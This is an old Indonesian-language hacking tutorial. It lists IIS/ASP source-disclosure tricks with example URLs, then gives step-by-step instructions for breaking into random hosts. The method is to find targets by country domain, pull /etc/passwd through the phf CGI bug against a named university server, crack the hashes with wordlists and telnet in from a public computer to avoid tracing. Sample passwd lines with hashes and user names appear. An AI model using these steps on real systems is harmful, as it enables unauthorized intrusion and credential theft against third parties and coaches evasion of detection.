HACKING.

Webhacking


1. IIS 4.0 IIshack Vulnerabillity
    dapat ditemukan di http://www.technotronic.com

2. Active Server Pages (ASP) Vulnerabillity
    1. (ASP DOT Bug Vulnerabillity) (kesalahan titik pada setiap akhir
         .ASP)
         di lihat di http://oliver.efri.hr/~crv/security/bugs/NT/asp.html
         vulnerabillity-nya dapat di ketahui dengan penambahan titik (.) pada setiap akhir asp

         misal, http://192.168.51.101/code/example.asp.

        namun dalam perkembangannya diperbaiki oleh Microsoft USA, dan menimbulkan lagi  Vulnerabillity baru yaitu:

          http://192.168.51.101/code/example%2easp

          jadi menambahkan %2e (tanpa titik/disambung) dengan asp

     2. ASP Alternate Data Streams Vulnerabillity
         penambahan titik pada file.asp, yaitu

         http://192.168.51.101/scripts/file.asp

         menjadi

         http://192.168.51.101/scripts/file.asp::$DATA

(sumber, Hacking Exposed)

Cara mendapatkan shell gratis tanpa beli.

perlu beberapa bahan yaitu:
1. Web browser (minimal 3.0)
2. Program cracker (gunakan crackerjack atau starcracker)
3. daftar kata (wordlist/dictionary) - GlobalKOS KOSdict - 11.2 MB
4. KOmputer umum

step:
1. buka 2 window
2. window yang 1, dipakai untuk membuka www.altavista.com/sk,
dengan keywordnya, host:ac.il) jika menginginkan host2 dari israel,
host:co.jp, jika menginginkan yang dari jepang. trus liat hasilnya
3. window yang ke 2, digunakan untuk mencari pasw dari host2 yang didapat
pada window 1, caranya dengan memasukan :
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

misalnya

http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

4. hasilnya kemungkinan ada 4.
1. error..message...(kalo udah ginian, maka harus kembali lagi ke awal...)
2. smile, you're on candid camera...( artinya, nomor ip kita direkam, dan disimpan diserver si target)
3. muncul tulisan: root:*0:0:SystemAdministrator:/:/bin/cshsysadm:*:1:1:BokephMemendez:/usr/adm:/bin/bash.

perhatikan bahwa setelah tanda titik dua yang pertama, selalu muncul tanda asteriks (*). ini artinya
kamu berhasil mendapatkan password hanya saja sayangnya sang fil sudah dishadow...harus ada
akses ROOT, terpaksa harus ke target berikutnya...

4. muncul tulisan: root:OUK9b8RqMRVNs:0:0:root,,,,:/:/bin/cshsysadm:*:0:0:system V administration:/usr/
admin:/bin/shdiag:*:0:996: HardwareDiagnostics:/usr/diags:/bin/csh Leonid:F5AymuqmXVFCU:1399:8:Leonid
Bebek:/usr/leonid:/bin/tcsh
(dalam kasus ini: langsung bisa dapat file passwd asli! tanpa shadow!!!)

5. segera setelahn menndapat file Passwd didapatkan, "save as" dan simpan
ditempat yang aman, terserah boleh kalo mau lanjut ke target berikut atau segra
mengcrack. patikan kom,puter untuk ngecrack aman dan bisa dibiarkan menganggur
selama berjam-jam atau kalo file passwdnya memang besar, bisa berhari-hari.
6. jalankan program crack, gunakan wordlist atas file passwd yang baru dipanen
7. kalo sudah berhasil ngecrack, kamu sudah siap untuk memakai shell unix baru.
8. telnet ke servernya, jangan lupa....gunakan komp umum, kalo pribadi....di phreak dulu.

(sumber, Anonymous)

(kembali ke menu awal)